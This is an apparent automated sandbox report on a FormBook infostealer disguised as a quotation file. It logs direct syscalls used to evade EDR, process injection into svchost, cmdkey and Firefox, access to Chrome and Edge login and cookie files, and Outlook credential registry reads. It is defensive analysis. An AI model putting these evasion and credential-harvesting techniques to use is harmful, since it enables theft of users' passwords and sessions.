                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038428C0 mov eax, dword ptr fs:[00000030h]3_2_038428C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038428C0 mov eax, dword ptr fs:[00000030h]3_2_038428C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038428C0 mov eax, dword ptr fs:[00000030h]3_2_038428C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038428C0 mov eax, dword ptr fs:[00000030h]3_2_038428C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038428C0 mov eax, dword ptr fs:[00000030h]3_2_038428C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038428C0 mov eax, dword ptr fs:[00000030h]3_2_038428C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038428C0 mov eax, dword ptr fs:[00000030h]3_2_038428C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038288C8 mov eax, dword ptr fs:[00000030h]3_2_038288C8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038288C8 mov eax, dword ptr fs:[00000030h]3_2_038288C8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038308CD mov eax, dword ptr fs:[00000030h]3_2_038308CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038308CD mov eax, dword ptr fs:[00000030h]3_2_038308CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A8F0 mov eax, dword ptr fs:[00000030h]3_2_0383A8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A8F0 mov eax, dword ptr fs:[00000030h]3_2_0383A8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A8F0 mov eax, dword ptr fs:[00000030h]3_2_0383A8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A8F0 mov eax, dword ptr fs:[00000030h]3_2_0383A8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A8F0 mov eax, dword ptr fs:[00000030h]3_2_0383A8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A8F0 mov eax, dword ptr fs:[00000030h]3_2_0383A8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038648F0 mov eax, dword ptr fs:[00000030h]3_2_038648F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C88FB mov eax, dword ptr fs:[00000030h]3_2_038C88FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C819 mov eax, dword ptr fs:[00000030h]3_2_0386C819
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C819 mov eax, dword ptr fs:[00000030h]3_2_0386C819
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0835 mov eax, dword ptr fs:[00000030h]3_2_038E0835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0835 mov eax, dword ptr fs:[00000030h]3_2_038E0835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0835 mov eax, dword ptr fs:[00000030h]3_2_038E0835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0835 mov eax, dword ptr fs:[00000030h]3_2_038E0835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0835 mov eax, dword ptr fs:[00000030h]3_2_038E0835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0835 mov eax, dword ptr fs:[00000030h]3_2_038E0835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0835 mov eax, dword ptr fs:[00000030h]3_2_038E0835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0835 mov eax, dword ptr fs:[00000030h]3_2_038E0835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0835 mov eax, dword ptr fs:[00000030h]3_2_038E0835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0835 mov eax, dword ptr fs:[00000030h]3_2_038E0835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0835 mov eax, dword ptr fs:[00000030h]3_2_038E0835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0835 mov eax, dword ptr fs:[00000030h]3_2_038E0835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0835 mov eax, dword ptr fs:[00000030h]3_2_038E0835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BC870 mov eax, dword ptr fs:[00000030h]3_2_038BC870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B8F8B mov eax, dword ptr fs:[00000030h]3_2_038B8F8B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B8F8B mov eax, dword ptr fs:[00000030h]3_2_038B8F8B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B8F8B mov eax, dword ptr fs:[00000030h]3_2_038B8F8B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840F90 mov eax, dword ptr fs:[00000030h]3_2_03840F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840F90 mov ecx, dword ptr fs:[00000030h]3_2_03840F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840F90 mov eax, dword ptr fs:[00000030h]3_2_03840F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840F90 mov eax, dword ptr fs:[00000030h]3_2_03840F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840F90 mov eax, dword ptr fs:[00000030h]3_2_03840F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840F90 mov eax, dword ptr fs:[00000030h]3_2_03840F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840F90 mov eax, dword ptr fs:[00000030h]3_2_03840F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840F90 mov eax, dword ptr fs:[00000030h]3_2_03840F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840F90 mov eax, dword ptr fs:[00000030h]3_2_03840F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840F90 mov eax, dword ptr fs:[00000030h]3_2_03840F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840F90 mov eax, dword ptr fs:[00000030h]3_2_03840F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840F90 mov eax, dword ptr fs:[00000030h]3_2_03840F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840F90 mov eax, dword ptr fs:[00000030h]3_2_03840F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834FB6 mov eax, dword ptr fs:[00000030h]3_2_03834FB6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385CFB0 mov eax, dword ptr fs:[00000030h]3_2_0385CFB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385CFB0 mov eax, dword ptr fs:[00000030h]3_2_0385CFB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03868FBC mov eax, dword ptr fs:[00000030h]3_2_03868FBC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EEFD3 mov eax, dword ptr fs:[00000030h]3_2_038EEFD3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DAFD0 mov eax, dword ptr fs:[00000030h]3_2_038DAFD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DAFD0 mov eax, dword ptr fs:[00000030h]3_2_038DAFD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DAFD0 mov eax, dword ptr fs:[00000030h]3_2_038DAFD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DAFD0 mov eax, dword ptr fs:[00000030h]3_2_038DAFD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03846FE0 mov eax, dword ptr fs:[00000030h]3_2_03846FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03846FE0 mov ecx, dword ptr fs:[00000030h]3_2_03846FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03846FE0 mov ecx, dword ptr fs:[00000030h]3_2_03846FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03846FE0 mov eax, dword ptr fs:[00000030h]3_2_03846FE0
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_00120B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,2_2_00120B62
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000F2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_000F2622
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000E083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_000E083F
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000E09D5 SetUnhandledExceptionFilter,2_2_000E09D5
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000E0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_000E0C21

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtQueryInformationProcess: Direct from: 0x77502B46Jump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtResumeThread: Direct from: 0x77502EDCJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtCreateUserProcess: Direct from: 0x7750363CJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtProtectVirtualMemory: Direct from: 0x77502EBCJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtDelayExecution: Direct from: 0x77502CFCJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtOpenKeyEx: Direct from: 0x77502ABCJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtSetInformationThread: Direct from: 0x774F6319Jump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtClose: Direct from: 0x77502A8C
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtCreateKey: Direct from: 0x77502B8CJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtSetInformationThread: Direct from: 0x77502A6CJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtWriteVirtualMemory: Direct from: 0x7750482CJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtAllocateVirtualMemory: Direct from: 0x7750480CJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtQueryVolumeInformationFile: Direct from: 0x77502E4CJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtDeviceIoControlFile: Direct from: 0x77502A0CJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtQuerySystemInformation: Direct from: 0x775047ECJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtAllocateVirtualMemory: Direct from: 0x77502B0CJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtOpenSection: Direct from: 0x77502D2CJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtQueryAttributesFile: Direct from: 0x77502D8CJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtCreateFile: Direct from: 0x77502F0CJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtProtectVirtualMemory: Direct from: 0x774F7A4EJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtReadVirtualMemory: Direct from: 0x77502DACJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtOpenFile: Direct from: 0x77502CECJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtAllocateVirtualMemory: Direct from: 0x77503BBCJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtQueryInformationToken: Direct from: 0x77502BCCJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtSetInformationProcess: Direct from: 0x77502B7CJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtMapViewOfSection: Direct from: 0x77502C3CJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtAllocateVirtualMemory: Direct from: 0x77502B1CJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtResumeThread: Direct from: 0x775035CCJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtReadFile: Direct from: 0x775029FCJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtQuerySystemInformation: Direct from: 0x77502D1CJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtNotifyChangeKey: Direct from: 0x77503B4CJump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeNtWriteVirtualMemory: Direct from: 0x77502D5CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmdkey.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\cmdkey.exeThread register set: target process: 3380Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\cmdkey.exeThread APC queued: target process: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: CB8008Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_00121201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,2_2_00121201
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_00102BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,2_2_00102BA5
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_0012B226 SendInput,keybd_event,2_2_0012B226
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_001422DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,2_2_001422DA
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\QUOTATION#050125.exe"Jump to behavior
                Source: C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exeProcess created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_00120B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,2_2_00120B62
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_00121663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,2_2_00121663
                Source: QUOTATION#050125.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: SwDwSdNMaTt.exe, 00000005.00000000.289197192384.00000000019A0000.00000002.00000001.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000005.00000002.293705434048.00000000019A0000.00000002.00000001.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000000.289343740280.0000000001420000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: QUOTATION#050125.exe, SwDwSdNMaTt.exe, 00000005.00000000.289197192384.00000000019A0000.00000002.00000001.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000005.00000002.293705434048.00000000019A0000.00000002.00000001.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000000.289343740280.0000000001420000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: SwDwSdNMaTt.exe, 00000005.00000000.289197192384.00000000019A0000.00000002.00000001.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000005.00000002.293705434048.00000000019A0000.00000002.00000001.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000000.289343740280.0000000001420000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000E0698 cpuid 2_2_000E0698
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_00138195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,2_2_00138195
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_0011D27A GetUserNameW,2_2_0011D27A
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000FB952 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_000FB952
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_000C42DE

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.293705525670.0000000000C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.289276636608.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.289276489302.0000000003BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.292817073543.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.292817177626.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.293706459836.0000000004460000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\cmdkey.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: QUOTATION#050125.exeBinary or memory string: WIN_81
                Source: QUOTATION#050125.exeBinary or memory string: WIN_XP
                Source: QUOTATION#050125.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: QUOTATION#050125.exeBinary or memory string: WIN_XPe
                Source: QUOTATION#050125.exeBinary or memory string: WIN_VISTA
                Source: QUOTATION#050125.exeBinary or memory string: WIN_7
                Source: QUOTATION#050125.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.293705525670.0000000000C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.289276636608.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.289276489302.0000000003BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.292817073543.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.292817177626.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.293706459836.0000000004460000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_00141204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,2_2_00141204
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_00141806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00141806

                Mitre Att&ck Matrix

